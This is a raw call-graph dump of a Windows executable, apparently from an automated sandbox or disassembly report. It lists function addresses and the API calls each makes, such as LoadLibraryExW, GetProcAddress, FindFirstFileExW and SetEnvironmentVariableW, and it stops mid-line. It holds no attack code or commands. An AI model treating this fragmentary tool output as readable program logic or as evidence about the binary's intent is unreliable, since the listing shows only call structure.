17529->17606 17531 7ff73ae17d04 17536 7ff73ae12c50 59 API calls 17531->17536 17532 7ff73ae17cd0 17620 7ff73ae12c50 17532->17620 17533 7ff73ae17b60 61 API calls 17537 7ff73ae17c92 __vcrt_freefls 17533->17537 17536->17529 17537->17531 17537->17532 17558 7ff73ae112c2 17557->17558 17559 7ff73ae13fd0 116 API calls 17558->17559 17560 7ff73ae112f2 17559->17560 17561 7ff73ae112fa 17560->17561 17562 7ff73ae11311 17560->17562 17563 7ff73ae12b30 59 API calls 17561->17563 17564 7ff73ae20814 73 API calls 17562->17564 17569 7ff73ae1130a __vcrt_freefls 17563->17569 17565 7ff73ae11323 17564->17565 17566 7ff73ae11327 17565->17566 17567 7ff73ae1134d 17565->17567 17568 7ff73ae12890 59 API calls 17566->17568 17571 7ff73ae11368 17567->17571 17572 7ff73ae11390 17567->17572 17570 7ff73ae1133e 17568->17570 17573 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 17569->17573 17574 7ff73ae2018c 74 API calls 17570->17574 17575 7ff73ae12890 59 API calls 17571->17575 17576 7ff73ae113aa 17572->17576 17585 7ff73ae11463 17572->17585 17577 7ff73ae11454 17573->17577 17574->17569 17578 7ff73ae11383 17575->17578 17579 7ff73ae11050 98 API calls 17576->17579 17577->17438 17577->17441 17580 7ff73ae2018c 74 API calls 17578->17580 17581 7ff73ae113bb 17579->17581 17580->17569 17589 7ff73ae113c3 17581->17589 17593 7ff73ae114d2 __vcrt_freefls 17581->17593 17582 7ff73ae2018c 74 API calls 17584 7ff73ae113cf 17582->17584 17583 7ff73ae204dc _fread_nolock 53 API calls 17583->17585 17586 7ff73ae177c0 72 API calls 17584->17586 17585->17583 17587 7ff73ae114bb 17585->17587 17585->17589 17588 7ff73ae113de 17586->17588 17590 7ff73ae12890 59 API calls 17587->17590 17588->17569 17589->17582 17590->17593 17591 7ff73ae2018c 74 API calls 17591->17569 17593->17591 17601 7ff73ae13f6a 17600->17601 17602 7ff73ae18ae0 57 API calls 17601->17602 17603 7ff73ae13f92 17602->17603 17604 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 17603->17604 17605 7ff73ae13fba 17604->17605 17605->17529 17605->17533 17605->17537 17607 7ff73ae177d0 17606->17607 17608 7ff73ae11ef0 49 API calls 17607->17608 17609 7ff73ae17801 17608->17609 17621 7ff73ae12c70 17620->17621 17622 7ff73ae24ac4 49 API calls 17621->17622 17693 7ff73ae131e4 17692->17693 17694 7ff73ae24ac4 49 API calls 17693->17694 17695 7ff73ae1320a 17694->17695 17696 7ff73ae1321b 17695->17696 17752 7ff73ae25dec 17695->17752 17698 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 17696->17698 17699 7ff73ae13239 17698->17699 17699->17481 17701 7ff73ae175ae 17700->17701 17702 7ff73ae13fd0 116 API calls 17701->17702 17703 7ff73ae175dd 17702->17703 17704 7ff73ae11ef0 49 API calls 17703->17704 17705 7ff73ae17606 17704->17705 17738 7ff73ae250aa 17737->17738 17739 7ff73ae2507d 17737->17739 17753 7ff73ae25e09 17752->17753 17754 7ff73ae25e15 17752->17754 17769 7ff73ae25700 17753->17769 17756 7ff73ae24f98 45 API calls 17754->17756 17758 7ff73ae25e3d 17756->17758 17759 7ff73ae2f3e4 5 API calls 17758->17759 17761 7ff73ae25e4d 17758->17761 17759->17761 17770 7ff73ae25737 17769->17770 17771 7ff73ae2571a 17769->17771 17770->17771 17772 7ff73ae2574a CreateFileW 17770->17772 17773 7ff73ae254a4 _fread_nolock 11 API calls 17771->17773 17965 7ff73ae263dc 17964->17965 17966 7ff73ae26402 17965->17966 17969 7ff73ae26435 17965->17969 17967 7ff73ae254c4 memcpy_s 11 API calls 17966->17967 17968 7ff73ae26407 17967->17968 17970 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 17968->17970 17971 7ff73ae26448 17969->17971 17972 7ff73ae2643b 17969->17972 17982 7ff73ae14029 17970->17982 17983 7ff73ae2b1ec 17971->17983 17973 7ff73ae254c4 memcpy_s 11 API calls 17972->17973 17973->17982 17982->16320 17996 7ff73ae30cb8 EnterCriticalSection 17983->17996 18344 7ff73ae290a0 18343->18344 18347 7ff73ae28b7c 18344->18347 18346 7ff73ae290b9 18348 7ff73ae28b97 18347->18348 18349 7ff73ae28bc6 18347->18349 18350 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 18348->18350 18357 7ff73ae2536c EnterCriticalSection 18349->18357 18356 7ff73ae28bb7 18350->18356 18356->18346 18359 7ff73ae1ffb1 18358->18359 18360 7ff73ae1ff83 18358->18360 18367 7ff73ae1ffa3 18359->18367 18368 7ff73ae2536c EnterCriticalSection 18359->18368 18361 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 18360->18361 18361->18367 18367->16334 18370 7ff73ae13fd0 116 API calls 18369->18370 18371 7ff73ae115c7 18370->18371 18372 7ff73ae115cf 18371->18372 18373 7ff73ae115f0 18371->18373 18374 7ff73ae12b30 59 API calls 18372->18374 18375 7ff73ae20814 73 API calls 18373->18375 18376 7ff73ae115df 18374->18376 18377 7ff73ae11601 18375->18377 18376->16339 18378 7ff73ae11621 18377->18378 18379 7ff73ae11605 18377->18379 18382 7ff73ae11651 18378->18382 18383 7ff73ae11631 18378->18383 18380 7ff73ae12890 59 API calls 18379->18380 18381 7ff73ae1161c __vcrt_freefls 18380->18381 18387 7ff73ae2018c 74 API calls 18381->18387 18385 7ff73ae1167d 18382->18385 18386 7ff73ae11666 18382->18386 18384 7ff73ae12890 59 API calls 18383->18384 18384->18381 18385->18381 18390 7ff73ae204dc _fread_nolock 53 API calls 18385->18390 18391 7ff73ae116be 18385->18391 18388 7ff73ae11050 98 API calls 18386->18388 18389 7ff73ae116f7 18387->18389 18388->18381 18389->16339 18390->18385 18392 7ff73ae12890 59 API calls 18391->18392 18392->18381 18395 7ff73ae119d3 18393->18395 18396 7ff73ae1196f 18393->18396 18394 7ff73ae25070 45 API calls 18394->18396 18395->16353 18396->18394 18396->18395 18398 7ff73ae18ae0 57 API calls 18397->18398 18399 7ff73ae18277 LoadLibraryExW 18398->18399 18400 7ff73ae18294 __vcrt_freefls 18399->18400 18400->16366 18402 7ff73ae16f19 18401->18402 18403 7ff73ae16f3c GetProcAddress 18401->18403 18406 7ff73ae129e0 57 API calls 18402->18406 18403->18402 18404 7ff73ae16f61 GetProcAddress 18403->18404 18404->18402 18461 7ff73ae15bd0 18460->18461 18462 7ff73ae11ef0 49 API calls 18461->18462 18463 7ff73ae15c02 18462->18463 18464 7ff73ae15c2b 18463->18464 18465 7ff73ae15c0b 18463->18465 18467 7ff73ae15c82 18464->18467 18469 7ff73ae14050 49 API calls 18464->18469 18466 7ff73ae12b30 59 API calls 18465->18466 18487 7ff73ae15c21 18466->18487 18468 7ff73ae14050 49 API calls 18467->18468 18470 7ff73ae15c9b 18468->18470 18471 7ff73ae15c4c 18469->18471 18472 7ff73ae15cb9 18470->18472 18475 7ff73ae12b30 59 API calls 18470->18475 18473 7ff73ae15c6a 18471->18473 18477 7ff73ae12b30 59 API calls 18471->18477 18476 7ff73ae18260 58 API calls 18472->18476 18478 7ff73ae13f60 57 API calls 18473->18478 18474 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 18479 7ff73ae1346e 18474->18479 18475->18472 18480 7ff73ae15cc6 18476->18480 18477->18473 18481 7ff73ae15c74 18478->18481 18479->16387 18488 7ff73ae15d20 18479->18488 18482 7ff73ae15ccb 18480->18482 18483 7ff73ae15ced 18480->18483 18481->18467 18486 7ff73ae18260 58 API calls 18481->18486 18484 7ff73ae129e0 57 API calls 18482->18484 18558 7ff73ae151e0 GetProcAddress 18483->18558 18484->18487 18486->18467 18487->18474 18642 7ff73ae14de0 18488->18642 18490 7ff73ae15d44 18491 7ff73ae15d4c 18490->18491 18492 7ff73ae15d5d 18490->18492 18494 7ff73ae12b30 59 API calls 18491->18494 18649 7ff73ae14530 18492->18649 18528 7ff73ae15d58 18494->18528 18528->16389 18559 7ff73ae15220 GetProcAddress 18558->18559 18560 7ff73ae15202 18558->18560 18559->18560 18561 7ff73ae15245 GetProcAddress 18559->18561 18562 7ff73ae129e0 57 API calls 18560->18562 18561->18560 18563 7ff73ae1526a GetProcAddress 18561->18563 18564 7ff73ae15215 18562->18564 18563->18560 18565 7ff73ae15292 GetProcAddress 18563->18565 18564->18487 18565->18560 18566 7ff73ae152ba GetProcAddress 18565->18566 18566->18560 18644 7ff73ae14e05 18642->18644 18643 7ff73ae14e0d 18643->18490 18644->18643 18647 7ff73ae14f9f 18644->18647 18684 7ff73ae26fb8 18644->18684 18645 7ff73ae1514a __vcrt_freefls 18645->18490 18646 7ff73ae14250 47 API calls 18646->18647 18647->18645 18647->18646 18650 7ff73ae14560 18649->18650 18651 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 18650->18651 18685 7ff73ae26fe8 18684->18685 18688 7ff73ae264b4 18685->18688 18689 7ff73ae264f7 18688->18689 18690 7ff73ae264e5 18688->18690 18692 7ff73ae26541 18689->18692 18695 7ff73ae26504 18689->18695 18691 7ff73ae254c4 memcpy_s 11 API calls 18690->18691 18694 7ff73ae264ea 18691->18694 18693 7ff73ae2655c 18692->18693 18696 7ff73ae24900 45 API calls 18692->18696 18701 7ff73ae2657e 18693->18701 18699 7ff73ae2add8 _invalid_parameter_noinfo 37 API calls 18695->18699 18696->18693 18769 7ff73ae2b710 __GetCurrentState 45 API calls 18768->18769 18770 7ff73ae2a971 18769->18770 18771 7ff73ae2aa9c __GetCurrentState 45 API calls 18770->18771 18772 7ff73ae2a991 18771->18772 19430 7ff73ae3a96e 19431 7ff73ae3a97e 19430->19431 19434 7ff73ae25378 LeaveCriticalSection 19431->19434 18840 7ff73ae2fcec 18841 7ff73ae2fede 18840->18841 18843 7ff73ae2fd2e _isindst 18840->18843 18842 7ff73ae254c4 memcpy_s 11 API calls 18841->18842 18860 7ff73ae2fece 18842->18860 18843->18841 18846 7ff73ae2fdae _isindst 18843->18846 18844 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 18845 7ff73ae2fef9 18844->18845 18861 7ff73ae36904 18846->18861 18851 7ff73ae2ff0a 18853 7ff73ae2aec4 _wfindfirst32i64 17 API calls 18851->18853 18855 7ff73ae2ff1e 18853->18855 18858 7ff73ae2fe0b 18858->18860 18885 7ff73ae36948 18858->18885 18860->18844 18862 7ff73ae36913 18861->18862 18865 7ff73ae2fdcc 18861->18865 18892 7ff73ae30cb8 EnterCriticalSection 18862->18892 18867 7ff73ae35d08 18865->18867 18868 7ff73ae2fde1 18867->18868 18869 7ff73ae35d11 18867->18869 18868->18851 18873 7ff73ae35d38 18868->18873 18870 7ff73ae254c4 memcpy_s 11 API calls 18869->18870 18871 7ff73ae35d16 18870->18871 18872 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 18871->18872 18872->18868 18874 7ff73ae2fdf2 18873->18874 18875 7ff73ae35d41 18873->18875 18874->18851 18879 7ff73ae35d68 18874->18879 18876 7ff73ae254c4 memcpy_s 11 API calls 18875->18876 18877 7ff73ae35d46 18876->18877 18878 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 18877->18878 18878->18874 18880 7ff73ae35d71 18879->18880 18882 7ff73ae2fe03 18879->18882 18881 7ff73ae254c4 memcpy_s 11 API calls 18880->18881 18883 7ff73ae35d76 18881->18883 18882->18851 18882->18858 18884 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 18883->18884 18884->18882 18893 7ff73ae30cb8 EnterCriticalSection 18885->18893 18894 7ff73ae29ef1 18895 7ff73ae2a968 45 API calls 18894->18895 18896 7ff73ae29ef6 18895->18896 18897 7ff73ae29f67 18896->18897 18898 7ff73ae29f1d GetModuleHandleW 18896->18898 18906 7ff73ae29df4 18897->18906 18898->18897 18904 7ff73ae29f2a 18898->18904 18904->18897 18920 7ff73ae2a018 GetModuleHandleExW 18904->18920 18926 7ff73ae30cb8 EnterCriticalSection 18906->18926 18921 7ff73ae2a04c GetProcAddress 18920->18921 18922 7ff73ae2a075 18920->18922 18923 7ff73ae2a05e 18921->18923 18924 7ff73ae2a07a FreeLibrary 18922->18924 18925 7ff73ae2a081 18922->18925 18923->18922 18924->18925 18925->18897 18937 7ff73ae1b4f0 18938 7ff73ae1b513 18937->18938 18939 7ff73ae1b52f memcpy_s 18937->18939 18940 7ff73ae2dbbc 12 API calls 18938->18940 18940->18939 19074 7ff73ae3aaf4 19077 7ff73ae25378 LeaveCriticalSection 19074->19077 19088 7ff73ae2a2e0 19091 7ff73ae2a25c 19088->19091 19098 7ff73ae30cb8 EnterCriticalSection 19091->19098 19099 7ff73ae2cae0 19110 7ff73ae30cb8 EnterCriticalSection 19099->19110 18773 7ff73ae27e4c 18774 7ff73ae27e7a 18773->18774 18775 7ff73ae27eb3 18773->18775 18777 7ff73ae254c4 memcpy_s 11 API calls 18774->18777 18775->18774 18776 7ff73ae27eb8 FindFirstFileExW 18775->18776 18778 7ff73ae27eda GetLastError 18776->18778 18779 7ff73ae27f21 18776->18779 18780 7ff73ae27e7f 18777->18780 18782 7ff73ae27f11 18778->18782 18783 7ff73ae27ee5 18778->18783 18833 7ff73ae280bc 18779->18833 18784 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 18780->18784 18786 7ff73ae254c4 memcpy_s 11 API calls 18782->18786 18783->18782 18789 7ff73ae27eef 18783->18789 18790 7ff73ae27f01 18783->18790 18785 7ff73ae27e8a 18784->18785 18791 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 18785->18791 18786->18785 18788 7ff73ae280bc _wfindfirst32i64 10 API calls 18792 7ff73ae27f47 18788->18792 18789->18782 18793 7ff73ae27ef4 18789->18793 18794 7ff73ae254c4 memcpy_s 11 API calls 18790->18794 18795 7ff73ae27e9e 18791->18795 18796 7ff73ae280bc _wfindfirst32i64 10 API calls 18792->18796 18797 7ff73ae254c4 memcpy_s 11 API calls 18793->18797 18794->18785 18798 7ff73ae27f55 18796->18798 18797->18785 18799 7ff73ae30e54 _wfindfirst32i64 37 API calls 18798->18799 18800 7ff73ae27f73 18799->18800 18800->18785 18801 7ff73ae27f7f 18800->18801 18802 7ff73ae2aec4 _wfindfirst32i64 17 API calls 18801->18802 18803 7ff73ae27f93 18802->18803 18804 7ff73ae27fbd 18803->18804 18807 7ff73ae27ffc FindNextFileW 18803->18807 18805 7ff73ae254c4 memcpy_s 11 API calls 18804->18805 18806 7ff73ae27fc2 18805->18806 18808 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 18806->18808 18809 7ff73ae2804c 18807->18809 18810 7ff73ae2800b GetLastError 18807->18810 18811 7ff73ae27fcd 18808->18811 18812 7ff73ae280bc _wfindfirst32i64 10 API calls 18809->18812 18813 7ff73ae2803f 18810->18813 18814 7ff73ae28016 18810->18814 18817 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 18811->18817 18816 7ff73ae28064 18812->18816 18815 7ff73ae254c4 memcpy_s 11 API calls 18813->18815 18814->18813 18819 7ff73ae28020 18814->18819 18820 7ff73ae28032 18814->18820 18815->18811 18818 7ff73ae280bc _wfindfirst32i64 10 API calls 18816->18818 18822 7ff73ae27fe0 18817->18822 18823 7ff73ae28072 18818->18823 18819->18813 18824 7ff73ae28025 18819->18824 18821 7ff73ae254c4 memcpy_s 11 API calls 18820->18821 18821->18811 18826 7ff73ae280bc _wfindfirst32i64 10 API calls 18823->18826 18825 7ff73ae254c4 memcpy_s 11 API calls 18824->18825 18825->18811 18827 7ff73ae28080 18826->18827 18828 7ff73ae30e54 _wfindfirst32i64 37 API calls 18827->18828 18829 7ff73ae2809e 18828->18829 18829->18811 18830 7ff73ae280a6 18829->18830 18831 7ff73ae2aec4 _wfindfirst32i64 17 API calls 18830->18831 18832 7ff73ae280ba 18831->18832 18834 7ff73ae280da FileTimeToSystemTime 18833->18834 18835 7ff73ae280d4 18833->18835 18836 7ff73ae280e9 SystemTimeToTzSpecificLocalTime 18834->18836 18837 7ff73ae280ff 18834->18837 18835->18834 18835->18837 18836->18837 18838 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 18837->18838 18839 7ff73ae27f39 18838->18839 18839->18788 15185 7ff73ae30f38 15186 7ff73ae30f5c 15185->15186 15190 7ff73ae30f6c 15185->15190 15336 7ff73ae254c4 15186->15336 15188 7ff73ae30f61 15189 7ff73ae3124c 15192 7ff73ae254c4 memcpy_s 11 API calls 15189->15192 15190->15189 15191 7ff73ae30f8e 15190->15191 15193 7ff73ae30faf 15191->15193 15339 7ff73ae315f4 15191->15339 15194 7ff73ae31251 15192->15194 15197 7ff73ae31021 15193->15197 15199 7ff73ae30fd5 15193->15199 15211 7ff73ae31015 15193->15211 15196 7ff73ae2af0c __free_lconv_num 11 API calls 15194->15196 15196->15188 15201 7ff73ae2f158 memcpy_s 11 API calls 15197->15201 15214 7ff73ae30fe4 15197->15214 15198 7ff73ae310ce 15204 7ff73ae3113d 15198->15204 15210 7ff73ae310eb 15198->15210 15354 7ff73ae29c50 15199->15354 15206 7ff73ae31037 15201->15206 15204->15214 15218 7ff73ae33a4c 40 API calls 15204->15218 15207 7ff73ae2af0c __free_lconv_num 11 API calls 15206->15207 15217 7ff73ae31045 15207->15217 15208 7ff73ae30ffd 15208->15211 15216 7ff73ae315f4 45 API calls 15208->15216 15209 7ff73ae30fdf 15212 7ff73ae254c4 memcpy_s 11 API calls 15209->15212 15213 7ff73ae2af0c __free_lconv_num 11 API calls 15210->15213 15211->15198 15211->15214 15366 7ff73ae379fc 15211->15366 15212->15214 15215 7ff73ae310f4 15213->15215 15360 7ff73ae2af0c 15214->15360 15226 7ff73ae310f9 15215->15226 15402 7ff73ae33a4c 15215->15402 15216->15211 15217->15211 15217->15214 15219 7ff73ae2f158 memcpy_s 11 API calls 15217->15219 15220 7ff73ae3117a 15218->15220 15221 7ff73ae31067 15219->15221 15222 7ff73ae2af0c __free_lconv_num 11 API calls 15220->15222 15224 7ff73ae2af0c __free_lconv_num 11 API calls 15221->15224 15225 7ff73ae31184 15222->15225 15224->15211 15225->15214 15225->15226 15227 7ff73ae31240 15226->15227 15316 7ff73ae2f158 15226->15316 15229 7ff73ae2af0c __free_lconv_num 11 API calls 15227->15229 15228 7ff73ae31125 15230 7ff73ae2af0c __free_lconv_num 11 API calls 15228->15230 15229->15188 15230->15226 15233 7ff73ae311d9 15323 7ff73ae2aa3c 15233->15323 15234 7ff73ae311d0 15235 7ff73ae2af0c __free_lconv_num 11 API calls 15234->15235 15237 7ff73ae311d7 15235->15237 15242 7ff73ae2af0c __free_lconv_num 11 API calls 15237->15242 15239 7ff73ae3127b 15332 7ff73ae2aec4 IsProcessorFeaturePresent 15239->15332 15240 7ff73ae311f0 15411 7ff73ae37b14 15240->15411 15242->15188 15247 7ff73ae31217 15251 7ff73ae254c4 memcpy_s 11 API calls 15247->15251 15248 7ff73ae31238 15250 7ff73ae2af0c __free_lconv_num 11 API calls 15248->15250 15250->15227 15252 7ff73ae3121c 15251->15252 15255 7ff73ae2af0c __free_lconv_num 11 API calls 15252->15255 15255->15237 15321 7ff73ae2f169 memcpy_s 15316->15321 15317 7ff73ae2f1ba 15320 7ff73ae254c4 memcpy_s 10 API calls 15317->15320 15318 7ff73ae2f19e RtlAllocateHeap 15319 7ff73ae2f1b8 15318->15319 15318->15321 15319->15233 15319->15234 15320->15319 15321->15317 15321->15318 15430 7ff73ae33c00 15321->15430 15324 7ff73ae2aa49 15323->15324 15325 7ff73ae2aa53 15323->15325 15324->15325 15330 7ff73ae2aa6e 15324->15330 15326 7ff73ae254c4 memcpy_s 11 API calls 15325->15326 15327 7ff73ae2aa5a 15326->15327 15439 7ff73ae2aea4 15327->15439 15329 7ff73ae2aa66 15329->15239 15329->15240 15330->15329 15331 7ff73ae254c4 memcpy_s 11 API calls 15330->15331 15331->15327 15333 7ff73ae2aed7 15332->15333 15498 7ff73ae2abd8 15333->15498 15520 7ff73ae2b888 GetLastError 15336->15520 15338 7ff73ae254cd 15338->15188 15340 7ff73ae31629 15339->15340 15346 7ff73ae31611 15339->15346 15341 7ff73ae2f158 memcpy_s 11 API calls 15340->15341 15349 7ff73ae3164d 15341->15349 15342 7ff73ae316ae 15344 7ff73ae2af0c __free_lconv_num 11 API calls 15342->15344 15344->15346 15346->15193 15347 7ff73ae2f158 memcpy_s 11 API calls 15347->15349 15348 7ff73ae2af0c __free_lconv_num 11 API calls 15348->15349 15349->15342 15349->15347 15349->15348 15350 7ff73ae2aa3c __std_exception_copy 37 API calls 15349->15350 15351 7ff73ae316bd 15349->15351 15353 7ff73ae316d2 15349->15353 15350->15349 15352 7ff73ae2aec4 _wfindfirst32i64 17 API calls 15351->15352 15352->15353 15537 7ff73ae2aa9c 15353->15537 15355 7ff73ae29c60 15354->15355 15356 7ff73ae29c69 15354->15356 15355->15356 15603 7ff73ae29728 15355->15603 15356->15208 15356->15209 15361 7ff73ae2af40 15360->15361 15362 7ff73ae2af11 RtlDeleteBoundaryDescriptor 15360->15362 15361->15188 15362->15361 15363 7ff73ae2af2c GetLastError 15362->15363 15364 7ff73ae2af39 __free_lconv_num 15363->15364 15365 7ff73ae254c4 memcpy_s 9 API calls 15364->15365 15365->15361 15367 7ff73ae37a09 15366->15367 15368 7ff73ae36bac 15366->15368 15370 7ff73ae24f98 45 API calls 15367->15370 15369 7ff73ae36bb9 15368->15369 15375 7ff73ae36bef 15368->15375 15371 7ff73ae254c4 memcpy_s 11 API calls 15369->15371 15390 7ff73ae36b60 15369->15390 15373 7ff73ae37a3d 15370->15373 15376 7ff73ae36bc3 15371->15376 15372 7ff73ae36c19 15377 7ff73ae254c4 memcpy_s 11 API calls 15372->15377 15374 7ff73ae37a42 15373->15374 15378 7ff73ae37a53 15373->15378 15382 7ff73ae37a6a 15373->15382 15374->15211 15375->15372 15379 7ff73ae36c3e 15375->15379 15380 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 15376->15380 15381 7ff73ae36c1e 15377->15381 15383 7ff73ae254c4 memcpy_s 11 API calls 15378->15383 15386 7ff73ae24f98 45 API calls 15379->15386 15391 7ff73ae36c29 15379->15391 15384 7ff73ae36bce 15380->15384 15385 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 15381->15385 15388 7ff73ae37a86 15382->15388 15389 7ff73ae37a74 15382->15389 15387 7ff73ae37a58 15383->15387 15384->15211 15385->15391 15386->15391 15392 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 15387->15392 15394 7ff73ae37a97 15388->15394 15395 7ff73ae37aae 15388->15395 15393 7ff73ae254c4 memcpy_s 11 API calls 15389->15393 15390->15211 15391->15211 15392->15374 15398 7ff73ae37a79 15393->15398 15896 7ff73ae36bfc 15394->15896 15905 7ff73ae39824 15395->15905 15400 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 15398->15400 15400->15374 15401 7ff73ae254c4 memcpy_s 11 API calls 15401->15374 15403 7ff73ae33a6e 15402->15403 15404 7ff73ae33a8b 15402->15404 15403->15404 15406 7ff73ae33a7c 15403->15406 15405 7ff73ae33a95 15404->15405 15945 7ff73ae38508 15404->15945 15952 7ff73ae30ebc 15405->15952 15408 7ff73ae254c4 memcpy_s 11 API calls 15406->15408 15410 7ff73ae33a81 memcpy_s 15408->15410 15410->15228 15412 7ff73ae24f98 45 API calls 15411->15412 15413 7ff73ae37b7a 15412->15413 15414 7ff73ae37b88 15413->15414 15964 7ff73ae2f3e4 15413->15964 15967 7ff73ae25584 15414->15967 15418 7ff73ae37c74 15421 7ff73ae37c85 15418->15421 15424 7ff73ae2af0c __free_lconv_num 11 API calls 15418->15424 15419 7ff73ae24f98 45 API calls 15420 7ff73ae37bf7 15419->15420 15423 7ff73ae37c00 15420->15423 15426 7ff73ae2f3e4 5 API calls 15420->15426 15422 7ff73ae31213 15421->15422 15425 7ff73ae2af0c __free_lconv_num 11 API calls 15421->15425 15422->15247 15422->15248 15427 7ff73ae25584 14 API calls 15423->15427 15424->15421 15425->15422 15426->15423 15428 7ff73ae37c5b 15427->15428 15428->15418 15429 7ff73ae37c63 SetEnvironmentVariableW 15428->15429 15429->15418 15433 7ff73ae33c40 15430->15433 15438 7ff73ae30cb8 EnterCriticalSection 15433->15438 15441 7ff73ae2ad3c 15439->15441 15442 7ff73ae2ad67 15441->15442 15445 7ff73ae2add8 15442->15445 15444 7ff73ae2ad8e 15453 7ff73ae2ab20 15445->15453 15448 7ff73ae2ae13 15448->15444 15451 7ff73ae2aec4 _wfindfirst32i64 17 API calls 15452 7ff73ae2aea3 15451->15452 15454 7ff73ae2ab77 15453->15454 15455 7ff73ae2ab3c GetLastError 15453->15455 15454->15448 15459 7ff73ae2ab8c 15454->15459 15456 7ff73ae2ab4c 15455->15456 15462 7ff73ae2b950 15456->15462 15460 7ff73ae2aba8 GetLastError SetLastError 15459->15460 15461 7ff73ae2abc0 15459->15461 15460->15461 15461->15448 15461->15451 15463 7ff73ae2b98a FlsSetValue 15462->15463 15464 7ff73ae2b96f FlsGetValue 15462->15464 15466 7ff73ae2b997 15463->15466 15467 7ff73ae2ab67 SetLastError 15463->15467 15465 7ff73ae2b984 15464->15465 15464->15467 15465->15463 15468 7ff73ae2f158 memcpy_s 11 API calls 15466->15468 15467->15454 15469 7ff73ae2b9a6 15468->15469 15470 7ff73ae2b9c4 FlsSetValue 15469->15470 15471 7ff73ae2b9b4 FlsSetValue 15469->15471 15473 7ff73ae2b9e2 15470->15473 15474 7ff73ae2b9d0 FlsSetValue 15470->15474 15472 7ff73ae2b9bd 15471->15472 15475 7ff73ae2af0c __free_lconv_num 11 API calls 15472->15475 15479 7ff73ae2b4b8 15473->15479 15474->15472 15475->15467 15484 7ff73ae2b390 15479->15484 15496 7ff73ae30cb8 EnterCriticalSection 15484->15496 15499 7ff73ae2ac12 _wfindfirst32i64 memcpy_s 15498->15499 15500 7ff73ae2ac3a RtlCaptureContext RtlLookupFunctionEntry 15499->15500 15501 7ff73ae2acaa IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15500->15501 15502 7ff73ae2ac74 RtlVirtualUnwind 15500->15502 15503 7ff73ae2acfc _wfindfirst32i64 15501->15503 15502->15501 15506 7ff73ae1bcc0 15503->15506 15507 7ff73ae1bcc9 15506->15507 15508 7ff73ae1bcd4 GetCurrentProcess TerminateProcess 15507->15508 15509 7ff73ae1bd20 IsProcessorFeaturePresent 15507->15509 15510 7ff73ae1bd38 15509->15510 15515 7ff73ae1bf14 RtlCaptureContext 15510->15515 15516 7ff73ae1bf2e RtlLookupFunctionEntry 15515->15516 15517 7ff73ae1bd4b 15516->15517 15518 7ff73ae1bf44 RtlVirtualUnwind 15516->15518 15519 7ff73ae1bce0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15517->15519 15518->15516 15518->15517 15521 7ff73ae2b8c9 FlsSetValue 15520->15521 15527 7ff73ae2b8ac 15520->15527 15522 7ff73ae2b8db 15521->15522 15526 7ff73ae2b8b9 15521->15526 15524 7ff73ae2f158 memcpy_s 5 API calls 15522->15524 15523 7ff73ae2b935 SetLastError 15523->15338 15525 7ff73ae2b8ea 15524->15525 15528 7ff73ae2b908 FlsSetValue 15525->15528 15529 7ff73ae2b8f8 FlsSetValue 15525->15529 15526->15523 15527->15521 15527->15526 15531 7ff73ae2b926 15528->15531 15532 7ff73ae2b914 FlsSetValue 15528->15532 15530 7ff73ae2b901 15529->15530 15533 7ff73ae2af0c __free_lconv_num 5 API calls 15530->15533 15534 7ff73ae2b4b8 memcpy_s 5 API calls 15531->15534 15532->15530 15533->15526 15535 7ff73ae2b92e 15534->15535 15536 7ff73ae2af0c __free_lconv_num 5 API calls 15535->15536 15536->15523 15546 7ff73ae33cc0 15537->15546 15572 7ff73ae33c78 15546->15572 15577 7ff73ae30cb8 EnterCriticalSection 15572->15577 15604 7ff73ae29741 15603->15604 15617 7ff73ae2973d 15603->15617 15626 7ff73ae32c60 15604->15626 15609 7ff73ae2975f 15652 7ff73ae2980c 15609->15652 15610 7ff73ae29753 15611 7ff73ae2af0c __free_lconv_num 11 API calls 15610->15611 15611->15617 15614 7ff73ae2af0c __free_lconv_num 11 API calls 15615 7ff73ae29786 15614->15615 15616 7ff73ae2af0c __free_lconv_num 11 API calls 15615->15616 15616->15617 15617->15356 15618 7ff73ae29a7c 15617->15618 15619 7ff73ae29aa5 15618->15619 15624 7ff73ae29abe 15618->15624 15619->15356 15620 7ff73ae2f158 memcpy_s 11 API calls 15620->15624 15621 7ff73ae29b4e 15623 7ff73ae2af0c __free_lconv_num 11 API calls 15621->15623 15622 7ff73ae304c8 WideCharToMultiByte 15622->15624 15623->15619 15624->15619 15624->15620 15624->15621 15624->15622 15625 7ff73ae2af0c __free_lconv_num 11 API calls 15624->15625 15625->15624 15627 7ff73ae32c6d 15626->15627 15631 7ff73ae29746 15626->15631 15671 7ff73ae2b7e4 15627->15671 15632 7ff73ae32f9c GetEnvironmentStringsW 15631->15632 15633 7ff73ae32fcc 15632->15633 15634 7ff73ae2974b 15632->15634 15635 7ff73ae304c8 WideCharToMultiByte 15633->15635 15634->15609 15634->15610 15636 7ff73ae3301d 15635->15636 15637 7ff73ae33024 FreeEnvironmentStringsW 15636->15637 15638 7ff73ae2dbbc _fread_nolock 12 API calls 15636->15638 15637->15634 15639 7ff73ae33037 15638->15639 15640 7ff73ae33048 15639->15640 15641 7ff73ae3303f 15639->15641 15643 7ff73ae304c8 WideCharToMultiByte 15640->15643 15642 7ff73ae2af0c __free_lconv_num 11 API calls 15641->15642 15644 7ff73ae33046 15642->15644 15645 7ff73ae3306b 15643->15645 15644->15637 15646 7ff73ae33079 15645->15646 15647 7ff73ae3306f 15645->15647 15649 7ff73ae2af0c __free_lconv_num 11 